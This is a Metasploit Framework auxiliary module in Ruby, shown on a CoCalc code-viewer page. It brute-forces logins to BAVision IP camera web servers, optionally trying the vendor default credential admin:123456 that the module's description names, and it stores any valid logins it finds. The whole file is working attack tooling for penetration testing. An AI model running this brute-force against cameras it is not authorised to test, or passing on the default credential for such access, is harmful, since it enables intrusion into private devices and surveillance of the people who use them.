Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
19670 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/login_scanner/bavision_cameras'

7
require 'metasploit/framework/credential_collection'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'BAVision IP Camera Web Server Login',

20
        'Description' => %q{

21
          This module will attempt to authenticate to an IP camera created by BAVision via the

22
          web service. By default, the vendor ships a default credential admin:123456 to its

23
          cameras, and the web server does not enforce lockouts in case of a bruteforce attack.

24
        },

25
        'Author' => [ 'sinn3r' ],

26
        'License' => MSF_LICENSE,

27
        'Notes' => {

28
          'Reliability' => UNKNOWN_RELIABILITY,

29
          'Stability' => UNKNOWN_STABILITY,

30
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

31
        }

32
      )

33
    )

34


35
    register_options(

36
      [

37
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])

38
      ]

39
    )

40
  end

41


42
  def scanner(ip)

43
    @scanner ||= lambda {

44
      cred_collection = build_credential_collection(

45
        username: datastore['USERNAME'],

46
        password: datastore['PASSWORD']

47
      )

48


49
      if datastore['TRYDEFAULT']

50
        # Add the default username and password

51
        print_status("Default credential admin:123456 added to the credential queue for testing.")

52
        cred_collection.add_public('admin')

53
        cred_collection.add_private('123456')

54
      end

55


56
      return Metasploit::Framework::LoginScanner::BavisionCameras.new(

57
        configure_http_login_scanner(

58
          host: ip,

59
          port: datastore['RPORT'],

60
          cred_details: cred_collection,

61
          stop_on_success: datastore['STOP_ON_SUCCESS'],

62
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

63
          connection_timeout: 5,

64
          http_username: datastore['HttpUsername'],

65
          http_password: datastore['HttpPassword']

66
        )

67
      )

68
    }.call

69
  end

70


71
  def report_good_cred(ip, port, result)

72
    service_data = {

73
      address: ip,

74
      port: port,

75
      service_name: 'http',

76
      protocol: 'tcp',

77
      workspace_id: myworkspace_id

78
    }

79


80
    credential_data = {

81
      module_fullname: self.fullname,

82
      origin_type: :service,

83
      private_data: result.credential.private,

84
      private_type: :password,

85
      username: result.credential.public,

86
    }.merge(service_data)

87


88
    login_data = {

89
      core: create_credential(credential_data),

90
      last_attempted_at: DateTime.now,

91
      status: result.status,

92
      proof: result.proof

93
    }.merge(service_data)

94


95
    create_credential_login(login_data)

96
  end

97


98
  def report_bad_cred(ip, rport, result)

99
    invalidate_login(

100
      address: ip,

101
      port: rport,

102
      protocol: 'tcp',

103
      public: result.credential.public,

104
      private: result.credential.private,

105
      realm_key: result.credential.realm_key,

106
      realm_value: result.credential.realm,

107
      status: result.status,

108
      proof: result.proof

109
    )

110
  end

111


112
  def bruteforce(ip)

113
    scanner(ip).scan! do |result|

114
      case result.status

115
      when Metasploit::Model::Login::Status::SUCCESSFUL

116
        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")

117
        report_good_cred(ip, rport, result)

118
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

119
        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)

120
        report_bad_cred(ip, rport, result)

121
      when Metasploit::Model::Login::Status::INCORRECT

122
        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")

123
        report_bad_cred(ip, rport, result)

124
      end

125
    end

126
  end

127


128
  def run_host(ip)

129
    unless scanner(ip).check_setup

130
      print_brute(:level => :error, :ip => ip, :msg => 'Target is not BAVision IP camera web server.')

131
      return

132
    end

133


134
    bruteforce(ip)

135
  end

136
end

137


138